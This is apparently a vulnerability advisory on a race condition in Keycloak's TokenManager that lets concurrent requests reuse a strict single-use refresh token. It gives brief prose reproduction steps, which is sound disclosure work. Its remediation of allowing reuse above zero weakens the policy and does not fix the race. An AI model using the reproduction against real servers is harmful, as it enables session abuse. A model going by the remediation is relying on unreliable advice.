Keycloak Refresh Token Reuse Bypass Vulnerability in TokenManager Class

A race condition vulnerability has been identified in the Keycloak server's TokenManager class, which handles refresh token processing and enforces reuse policies. When strict refresh token rotation is activated, the validation and updating of refresh token usage do not occur atomically. This flaw enables concurrent refresh requests to circumvent the single-use requirement, allowing multiple access tokens to be issued from the same refresh token. Consequently, the intended security enhancement of refresh token rotation in Keycloak can be compromised.

Impact

Exploitation of this vulnerability allows an attacker to bypass the refresh token reuse policy, particularly when it is set to enforce strict single-use. This manipulation enables a single refresh token to be used multiple times to obtain valid access tokens, thereby undermining the security measures designed to protect token integrity and rotation.

Reproduction

To reproduce this vulnerability, enable strict refresh token rotation in Keycloak by setting the refreshTokenMaxReuse policy to zero. Then, send concurrent requests that use the same refresh token. The TokenManager will fail to update the token usage properly, allowing multiple access tokens to be issued from a single refresh token before the usage counter is incremented.

Remediation

To address this vulnerability, configure the refreshTokenMaxReuse policy in Keycloak to a value greater than zero. This adjustment allows a limited number of reuses for refresh tokens, preserving the effectiveness of the Refresh Token Rotation security measure. After making this change, restart or redeploy the Keycloak service to apply the new configuration.